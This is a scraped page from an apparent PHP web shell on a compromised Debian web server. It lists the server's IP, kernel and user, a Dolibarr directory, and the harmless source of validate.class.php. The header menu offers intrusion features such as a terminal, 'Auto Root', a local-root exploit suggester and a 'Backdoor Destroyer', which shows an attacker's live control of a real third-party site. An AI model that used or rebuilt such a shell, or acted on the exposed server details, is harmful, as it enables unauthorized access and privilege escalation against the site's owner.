Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
gmd.bdcloud.fr /
core /
class /
Delete
Unzip
Name
Size
Permission
Date
Action
CMailFile.class.php
60.83
KB
-rw-r--r--
2022-09-27 16:06
CSMSFile.class.php
7.89
KB
-rw-r--r--
2022-09-27 16:06
antivir.class.php
5.23
KB
-rw-r--r--
2022-09-27 16:06
canvas.class.php
6.96
KB
-rw-r--r--
2022-09-27 16:06
ccountry.class.php
8.63
KB
-rw-r--r--
2022-09-27 16:06
comment.class.php
9.42
KB
-rw-r--r--
2022-09-27 16:06
commondocgenerator.class.php
63.6
KB
-rw-r--r--
2022-09-27 16:06
commonincoterm.class.php
3.73
KB
-rw-r--r--
2022-09-27 16:06
commoninvoice.class.php
32.41
KB
-rw-r--r--
2022-09-27 16:06
commonobject.class.php
331.6
KB
-rw-r--r--
2022-09-27 16:06
commonobjectline.class.php
3.58
KB
-rw-r--r--
2022-09-27 16:06
commonorder.class.php
3.21
KB
-rw-r--r--
2022-09-27 16:06
commonstickergenerator.class.php
10.48
KB
-rw-r--r--
2022-09-27 16:06
conf.class.php
42.8
KB
-rw-r--r--
2022-09-27 16:06
coreobject.class.php
9.43
KB
-rw-r--r--
2022-09-27 16:06
cproductnature.class.php
8.7
KB
-rw-r--r--
2022-09-27 16:06
cstate.class.php
7.15
KB
-rw-r--r--
2022-09-27 16:06
ctypent.class.php
7.38
KB
-rw-r--r--
2022-09-27 16:06
ctyperesource.class.php
10.87
KB
-rw-r--r--
2022-09-27 16:06
cunits.class.php
13.21
KB
-rw-r--r--
2022-09-27 16:06
defaultvalues.class.php
12.24
KB
-rw-r--r--
2022-09-27 16:06
discount.class.php
26.24
KB
-rw-r--r--
2022-09-27 16:06
doleditor.class.php
16.94
KB
-rw-r--r--
2022-09-27 16:06
dolexception.class.php
1
KB
-rw-r--r--
2022-09-27 16:06
dolgeoip.class.php
6.14
KB
-rw-r--r--
2022-09-27 16:06
dolgraph.class.php
46.53
KB
-rw-r--r--
2022-09-27 16:06
dolreceiptprinter.class.php
37
KB
-rw-r--r--
2022-09-27 16:06
emailsenderprofile.class.php
12.78
KB
-rw-r--r--
2022-09-27 16:06
evalmath.class.php
16.92
KB
-rw-r--r--
2022-09-27 16:06
events.class.php
7.98
KB
-rw-r--r--
2022-09-27 16:06
extrafields.class.php
88.38
KB
-rw-r--r--
2022-09-27 16:06
extralanguages.class.php
5.65
KB
-rw-r--r--
2022-09-27 16:06
fileupload.class.php
17.33
KB
-rw-r--r--
2022-09-27 16:06
fiscalyear.class.php
13.64
KB
-rw-r--r--
2022-09-27 16:06
genericobject.class.php
1.16
KB
-rw-r--r--
2022-09-27 16:06
google.class.php
2.32
KB
-rw-r--r--
2022-09-27 16:06
hookmanager.class.php
14.69
KB
-rw-r--r--
2022-09-27 16:06
html.form.class.php
406.13
KB
-rw-r--r--
2022-09-27 16:06
html.formaccounting.class.php
19.95
KB
-rw-r--r--
2022-09-27 16:06
html.formactions.class.php
16.39
KB
-rw-r--r--
2022-09-27 16:06
html.formadmin.class.php
15.13
KB
-rw-r--r--
2022-09-27 16:06
html.formbank.class.php
2.14
KB
-rw-r--r--
2022-09-27 16:06
html.formbarcode.class.php
7.25
KB
-rw-r--r--
2022-09-27 16:06
html.formcategory.class.php
2.12
KB
-rw-r--r--
2022-09-27 16:06
html.formcompany.class.php
40.76
KB
-rw-r--r--
2022-09-27 16:06
html.formcontract.class.php
6.7
KB
-rw-r--r--
2022-09-27 16:06
html.formcron.class.php
2.91
KB
-rw-r--r--
2022-09-27 16:06
html.formexpensereport.class.php
3.98
KB
-rw-r--r--
2022-09-27 16:06
html.formfile.class.php
92.42
KB
-rw-r--r--
2022-09-27 16:06
html.formintervention.class.php
4.37
KB
-rw-r--r--
2022-09-27 16:06
html.formldap.class.php
5.37
KB
-rw-r--r--
2022-09-27 16:06
html.formmail.class.php
64.23
KB
-rw-r--r--
2022-09-27 16:06
html.formmailing.class.php
1.82
KB
-rw-r--r--
2022-09-27 16:06
html.formmargin.class.php
13.28
KB
-rw-r--r--
2022-09-27 16:06
html.formorder.class.php
3.25
KB
-rw-r--r--
2022-09-27 16:06
html.formother.class.php
63.51
KB
-rw-r--r--
2022-09-27 16:06
html.formprojet.class.php
27.23
KB
-rw-r--r--
2022-09-27 16:06
html.formpropal.class.php
4.16
KB
-rw-r--r--
2022-09-27 16:06
html.formsetup.class.php
28.66
KB
-rw-r--r--
2022-09-27 16:06
html.formsms.class.php
10.84
KB
-rw-r--r--
2022-09-27 16:06
html.formsocialcontrib.class.php
3.85
KB
-rw-r--r--
2022-09-27 16:06
html.formticket.class.php
56.73
KB
-rw-r--r--
2022-09-27 16:06
html.formwebsite.class.php
9.25
KB
-rw-r--r--
2022-09-27 16:06
infobox.class.php
9.76
KB
-rw-r--r--
2022-09-27 16:06
interfaces.class.php
13.76
KB
-rw-r--r--
2022-09-27 16:06
ldap.class.php
44.78
KB
-rw-r--r--
2022-09-27 16:06
lessc.class.php
96.65
KB
-rw-r--r--
2022-09-27 16:06
link.class.php
9.58
KB
-rw-r--r--
2022-09-27 16:06
menu.class.php
4.51
KB
-rw-r--r--
2022-09-27 16:06
menubase.class.php
24.99
KB
-rw-r--r--
2022-09-27 16:06
notify.class.php
36.78
KB
-rw-r--r--
2022-09-27 16:06
openid.class.php
13.93
KB
-rw-r--r--
2022-09-27 16:06
rssparser.class.php
22.08
KB
-rw-r--r--
2022-09-27 16:06
smtps.class.php
62.18
KB
-rw-r--r--
2022-09-27 16:06
stats.class.php
19.22
KB
-rw-r--r--
2022-09-27 16:06
translate.class.php
43.89
KB
-rw-r--r--
2022-09-27 16:06
utils.class.php
40.2
KB
-rw-r--r--
2022-09-27 16:06
utils_diff.class.php
10.81
KB
-rw-r--r--
2022-09-27 16:06
validate.class.php
7.63
KB
-rw-r--r--
2022-09-27 16:06
vcard.class.php
9.67
KB
-rw-r--r--
2022-09-27 16:06
workboardresponse.class.php
1.81
KB
-rw-r--r--
2022-09-27 16:06
Save
Rename
<?php /* Copyright (C) 2021 John BOTELLA <john.botella@atm-consulting.fr> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/core/class/validate.class.php * \ingroup core * \brief File for Utils class */ /** * Class toolbox to validate values */ class Validate { /** * @var DoliDb Database handler (result of a new DoliDB) */ public $db; /** * @var Translate $outputLang */ public $outputLang; /** * @var string Error string * @see $errors */ public $error; /** * Constructor * * @param DoliDB $db Database handler * @param Translate $outputLang Output lang for error */ public function __construct($db, $outputLang = null) { global $langs; if (empty($outputLang)) { $this->outputLang = $langs; } else { $this->outputLang = $outputLang; } if (!is_object($this->outputLang) || !method_exists($this->outputLang, 'load')) { return false; } $this->outputLang->loadLangs(array('validate', 'errors')); $this->db = $db; } /** * Use to clear errors msg or other ghost vars * @return null */ protected function clear() { $this->error = ''; } /** * Use to clear errors msg or other ghost vars * * @param string $errMsg your error message * @return null */ protected function setError($errMsg) { $this->error = $errMsg; } /** * Check for e-mail validity * * @param string $email e-mail address to validate * @param int $maxLength string max length * @return boolean Validity is ok or not */ public function isEmail($email, $maxLength = false) { if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { $this->error = $this->outputLang->trans('RequireValidEmail'); return false; } return true; } /** * Check for price validity * * @param string $price Price to validate * @return boolean Validity is ok or not */ public function isPrice($price) { if (!preg_match('/^[0-9]{1,10}(\.[0-9]{1,9})?$/ui', $price)) { $this->error = $this->outputLang->trans('RequireValidValue'); return false; } return true; } /** * Check for timestamp validity * * @param string|int $stamp timestamp to validate * @return boolean Validity is ok or not */ public function isTimestamp($stamp) { if (!is_numeric($stamp) && (int) $stamp == $stamp) { $this->error = $this->outputLang->trans('RequireValidDate'); return false; } return true; } /** * Check for phone validity * * @param string $phone Phone string to validate * @return boolean Validity is ok or not */ public function isPhone($phone) { if (!preg_match('/^[+0-9. ()-]*$/ui', $phone)) { $this->error = $this->outputLang->trans('RequireValidPhone'); return false; } return true; } /** * Check for string max length validity * * @param string $string to validate * @param int $length max length * @return boolean Validity is ok or not */ public function isMaxLength($string, $length) { if (strlen($string) > $length) { $this->error = $this->outputLang->trans('RequireMaxLength', $length); return false; } return true; } /** * Check for string not empty * * @param string $string to validate * @return boolean Validity is ok or not */ public function isNotEmptyString($string) { if (!strlen($string)) { $this->error = $this->outputLang->trans('RequireANotEmptyValue'); return false; } return true; } /** * Check for string min length validity * * @param string $string to validate * @param int $length max length * @return boolean Validity is ok or not */ public function isMinLength($string, $length) { if (!strlen($string) < $length) { $this->error = $this->outputLang->trans('RequireMinLength', $length); return false; } return true; } /** * Check url validity * * @param string $url to validate * @return boolean Validity is ok or not */ public function isUrl($url) { if (!filter_var($url, FILTER_VALIDATE_URL)) { $this->error = $this->outputLang->trans('RequireValidUrl'); return false; } return true; } /** * Check Duration validity * * @param mixed $duration to validate * @return boolean Validity is ok or not */ public function isDuration($duration) { if (!is_int($duration) && $duration >= 0) { $this->error = $this->outputLang->trans('RequireValidDuration'); return false; } return true; } /** * Check numeric validity * * @param mixed $string to validate * @return boolean Validity is ok or not */ public function isNumeric($string) { if (!is_numeric($string)) { $this->error = $this->outputLang->trans('RequireValidNumeric'); return false; } return true; } /** * Check for boolean validity * * @param boolean $bool Boolean to validate * @return boolean Validity is ok or not */ public function isBool($bool) { if (!(is_null($bool) || is_bool($bool) || preg_match('/^[0|1]{1}$/ui', $bool))) { $this->error = $this->outputLang->trans('RequireValidBool'); return false; } return true; } /** * Check for all values in db * * @param array $values Boolean to validate * @param string $table the db table name without MAIN_DB_PREFIX * @param string $col the target col * @return boolean Validity is ok or not * @throws Exception */ public function isInDb($values, $table, $col) { if (!is_array($values)) { $value_arr = array($values); } else { $value_arr = $values; } if (!count($value_arr)) { $this->error = $this->outputLang->trans('RequireValue'); return false; } foreach ($value_arr as $val) { $sql = "SELECT ".$col." FROM ".MAIN_DB_PREFIX.$table." WHERE ".$col." = '".$this->db->escape($val)."'"; // nore quick than count(*) to check existing of a row $resql = $this->db->getRow($sql); if ($resql) { continue; } else { $this->error = $this->outputLang->trans('RequireValidExistingElement'); return false; } } return true; } /** * Check for all values in db * * @param array $values Boolean to validate * @param string $classname the class name * @param string $classpath the class path * @return boolean Validity is ok or not * @throws Exception */ public function isFetchable($values, $classname, $classpath) { if (!empty($classpath)) { if (dol_include_once($classpath)) { if ($classname && class_exists($classname)) { /** @var CommonObject $object */ $object = new $classname($this->db); if (!is_callable(array($object, 'fetch')) || !is_callable(array($object, 'isExistingObject'))) { $this->error = $this->outputLang->trans('BadSetupOfFieldFetchNotCallable'); return false; } if (!empty($object->table_element) && $object->isExistingObject($object->table_element, $values)) { return true; } else { $this->error = $this->outputLang->trans('RequireValidExistingElement'); } } else { $this->error = $this->outputLang->trans('BadSetupOfFieldClassNotFoundForValidation'); } } else { $this->error = $this->outputLang->trans('BadSetupOfFieldFileNotFound'); } } else { $this->error = $this->outputLang->trans('BadSetupOfField'); } return false; } }